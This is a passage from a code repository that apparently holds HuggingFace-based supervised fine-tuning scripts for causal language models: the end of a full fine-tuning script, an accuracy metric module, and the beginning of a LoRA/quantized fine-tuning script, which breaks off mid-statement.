Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ train_on_inputs: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_files: Optional[List[str]] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_files: Optional[List[str]] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." ) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") if self.dataset_name is None and self.train_files is None and self.validation_files is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_files is not None: extension = self.train_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file." if self.validation_files is not None: extension = self.validation_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file." def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) # pdb.set_trace() if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub). # # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called # 'text' is found. You can easily tweak this behavior (see below). # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. if True: data_files = {} dataset_args = {} if data_args.train_files is not None: data_files["train"] = data_args.train_files if data_args.validation_files is not None: data_files["validation"] = data_args.validation_files extension = ( data_args.train_files[0].split(".")[-1] if data_args.train_files is not None else data_args.validation_files.split(".")[-1] ) if extension == "txt": extension = "text" dataset_args["keep_linebreaks"] = data_args.keep_linebreaks raw_datasets = load_dataset( extension, data_files=data_files, cache_dir=os.path.join(training_args.output_dir,'dataset_cache'), use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, "padding_side":'left' } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) tokenizer.pad_token = tokenizer.eos_token if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) print(torch_dtype) torch_dtype = torch.float16 model = AutoModelForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, trust_remote_code=True, use_flash_attention_2=True, device_map={"": int(os.environ.get("LOCAL_RANK") or 0)} ) # model = prepare_model_for_int8_training(model, output_embedding_layer_name="embed_out", layer_norm_names=[]) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") # We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch # on a small vocab and want a smaller embedding size, remove this test. embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) > embedding_size: model.resize_token_embeddings(len(tokenizer)) # Preprocessing the datasets. # First we tokenize all the texts. if training_args.do_train: column_names = list(raw_datasets["train"].features) else: column_names = list(raw_datasets["validation"].features) train_on_inputs = True if len(column_names)==1: text_column_name = "text" if "text" in column_names else column_names[0] elif len(column_names)==2: input_column_name = 'input' if 'input' in column_names else column_names[0] target_column_name = 'target' if 'target' in column_names else column_names[0] train_on_inputs=False else: raise ValueError('输入文件列数不对') print('train_on_inputs',train_on_inputs) # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer([ item for item in examples[text_column_name]],truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) output['labels'] = output['input_ids'].copy() return output def tokenize(prompt): result = tokenizer(prompt,truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) result["labels"] = result["input_ids"].copy() return result def generate_and_tokenize_prompt(data_point): input_text = data_point[input_column_name] target_text = data_point[target_column_name] full_prompt = input_text+target_text tokenized_full_prompt = tokenize(full_prompt) if not train_on_inputs: user_prompt = input_text tokenized_user_prompt = tokenize(user_prompt) user_prompt_len = len(tokenized_user_prompt["input_ids"]) tokenized_full_prompt["labels"] = [ -100 ] * user_prompt_len + tokenized_full_prompt["labels"][ user_prompt_len: ] return tokenized_full_prompt with training_args.main_process_first(desc="dataset map tokenization"): if not data_args.streaming: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset", ) else: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, remove_columns=column_names, ) if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 2048: block_size = 2048 else: block_size = min(data_args.block_size, tokenizer.model_max_length) if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = tokenized_datasets["train"] if data_args.max_train_samples is not None: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) for index in random.sample(range(len(train_dataset)), 3): logger.info(f"Sample {index} of the training set: {train_dataset[index]}.") train_dataset = train_dataset.shuffle(seed=training_args.seed) if training_args.do_eval: if "validation" not in tokenized_datasets: raise ValueError("--do_eval requires a validation dataset") eval_dataset = tokenized_datasets["validation"] if data_args.max_eval_samples is not None: max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) metric = evaluate.load("accuracy.py") def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) # .reshape(-1) preds = preds[:, :-1].reshape(-1) # .reshape(-1) # print(labels.shape) # true_predictions = [ # [p for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # true_labels = [ # [l for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # preds = np.array(true_predictions).reshape(-1) # labels = np.array(true_labels).reshape(-1) return metric.compute(predictions=preds, references=labels) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, # Data collator will default to DataCollatorWithPadding, so we change it. data_collator=transformers.DataCollatorForSeq2Seq( tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True ), compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available()else None, ) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint print(training_args.local_rank,'start train') if torch.__version__ >= "2" and sys.platform != "win32": model = torch.compile(model) train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main() File: train/sft/accuracy.py # Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Accuracy metric.""" import datasets from sklearn.metrics import accuracy_score import evaluate _DESCRIPTION = """ Accuracy is the proportion of correct predictions among the total number of cases processed. It can be computed with: Accuracy = (TP + TN) / (TP + TN + FP + FN) Where: TP: True positive TN: True negative FP: False positive FN: False negative """ _KWARGS_DESCRIPTION = """ Args: predictions (`list` of `int`): Predicted labels. references (`list` of `int`): Ground truth labels. normalize (`boolean`): If set to False, returns the number of correctly classified samples. Otherwise, returns the fraction of correctly classified samples. Defaults to True. sample_weight (`list` of `float`): Sample weights Defaults to None. Returns: accuracy (`float` or `int`): Accuracy score. Minimum possible value is 0. Maximum possible value is 1.0, or the number of examples input, if `normalize` is set to `True`.. A higher score means higher accuracy. Examples: Example 1-A simple example >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0]) >>> print(results) {'accuracy': 0.5} Example 2-The same as Example 1, except with `normalize` set to `False`. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], normalize=False) >>> print(results) {'accuracy': 3.0} Example 3-The same as Example 1, except with `sample_weight` set. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], sample_weight=[0.5, 2, 0.7, 0.5, 9, 0.4]) >>> print(results) {'accuracy': 0.8778625954198473} """ _CITATION = """ @article{scikit-learn, title={Scikit-learn: Machine Learning in {P}ython}, author={Pedregosa, F. and Varoquaux, G. and Gramfort, A. and Michel, V. and Thirion, B. and Grisel, O. and Blondel, M. and Prettenhofer, P. and Weiss, R. and Dubourg, V. and Vanderplas, J. and Passos, A. and Cournapeau, D. and Brucher, M. and Perrot, M. and Duchesnay, E.}, journal={Journal of Machine Learning Research}, volume={12}, pages={2825--2830}, year={2011} } """ @evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION) class Accuracy(evaluate.Metric): def _info(self): return evaluate.MetricInfo( description=_DESCRIPTION, citation=_CITATION, inputs_description=_KWARGS_DESCRIPTION, features=datasets.Features( { "predictions": datasets.Sequence(datasets.Value("int32")), "references": datasets.Sequence(datasets.Value("int32")), } if self.config_name == "multilabel" else { "predictions": datasets.Value("int32"), "references": datasets.Value("int32"), } ), reference_urls=["https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html"], ) def _compute(self, predictions, references, normalize=True, sample_weight=None): return { "accuracy": float( accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight) ) } File: train/sft/finetune_clm_lora.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import math import os import sys import random from dataclasses import dataclass, field from itertools import chain import deepspeed from typing import Optional,List,Union import datasets import evaluate import torch from datasets import load_dataset from peft import ( # noqa: E402 LoraConfig, PeftModel, get_peft_model, get_peft_model_state_dict, prepare_model_for_int8_training, prepare_model_for_kbit_training, set_peft_model_state_dict, ) import transformers from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, AutoTokenizer, TrainerCallback, TrainerState, TrainerControl, HfArgumentParser, Trainer, TrainingArguments, default_data_collator, BitsAndBytesConfig, is_torch_tpu_available, set_seed, ) from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version, send_example_telemetry from transformers.utils.versions import require_version import pdb # Will error if the minimal version of Transformers is not installed. Remove at your own risks. # check_min_version("4.27.0.dev0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) lora_r: Optional[int] = field(default=16) lora_alpha: Optional[int] = field(default=32) target_modules: Optional[str] = field( default='q_proj,v_proj,k_proj,o_proj,gate_proj,down_proj,up_proj', metadata={ "help": "List of module names or regex expression of the module names to replace with Lora." "For example, ['q', 'v'] or '.*decoder.*(SelfAttention|EncDecAttention).*(q|v)$' " }, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) load_in_bits: Optional[int] = field(default=8) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) if type(self.target_modules)==str: self.target_modules = self.target_modules.split(',') @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ train_on_inputs: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_files: Optional[List[str]] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_files: Optional[List[str]] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." ) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") if self.dataset_name is None and self.train_files is None and self.validation_files is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_files is not None: extension = self.train_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file." if self.validation_files is not None: extension = self.validation_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file." class SavePeftModelCallback(TrainerCallback): def on_save( self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs, ): if state.is_world_process_zero: print('+++++++++++++++++save call back++++++++++++++++') checkpoint_folder = os.path.join( args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}" ) kwargs["model"].save_pretrained(checkpoint_folder) pytorch_model_path = os.path.join(checkpoint_folder, "pytorch_model.bin") if os.path.exists(pytorch_model_path): os.remove(pytorch_model_path) return control def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) # pdb.set_trace() if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub). # # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called # 'text' is found. You can easily tweak this behavior (see below). # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. if True: data_files = {} dataset_args = {} if data_args.train_files is not None: data_files["train"] = data_args.train_files if data_args.validation_files is not None: data_files["validation"] = data_args.validation_files extension = ( data_args.train_files[0].split(".")[-1] if data_args.train_files is not None else data_args.validation_files.split(".")[-1] ) if extension == "txt": extension = "text" dataset_args["keep_linebreaks"] = data_args.keep_linebreaks raw_datasets = load_dataset( extension, data_files=data_files, cache_dir=os.path.join(training_args.output_dir,'dataset_cache'), use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, "padding_side":'left' } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) tokenizer.pad_token = tokenizer.eos_token lora_config = LoraConfig( r=model_args.lora_r, lora_alpha=model_args.lora_alpha, # target_modules=["query_key_value"], # target_modules = ['q_proj', 'k_proj', 'v_proj', 'o_proj'], target_modules = model_args.target_modules, fan_in_fan_out = False, lora_dropout=0.05, inference_mode=False, bias="none", task_type="CAUSAL_LM", ) print(lora_config) bnb_config = BitsAndBytesConfig( load_in_4bit=True, bnb_4bit_use_double_quant=True, bnb_4bit_quant_type="nf4", bnb_4bit_compute_dtype=torch.bfloat16 ) if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) print(torch_dtype) torch_dtype = torch.float16 model = AutoModelForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, load_in_8bit=True if model_args.load_in_bits==8 else False, trust_remote_code=True, use_flash_attention_2=True, quantization_config=bnb_config if model_args.load_in_bits==4 else None, # device_map = 'auto' device_map={"": int(os.environ.get("LOCAL_RANK") or 0)} ) # model = prepare_model_for_int8_training(model, output_embedding_layer_name="embed_out", layer_norm_names=[]) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") # We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch # on a small vocab and want a smaller embedding size, remove this test. embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) > embedding_size: model.resize_token_embeddings(len(tokenizer)) if model_args.load_in_bits==8: model = prepare_model_for_int8_training(model) elif model_args.load_in_bits==4: model = prepare_model_for_kbit_training(model) # Preprocessing the datasets. # First we tokenize all the texts. if training_args.do_train: column_names = list(raw_datasets["train"].features) else: column_names = list(raw_datasets["validation"].features) train_on_inputs = True if 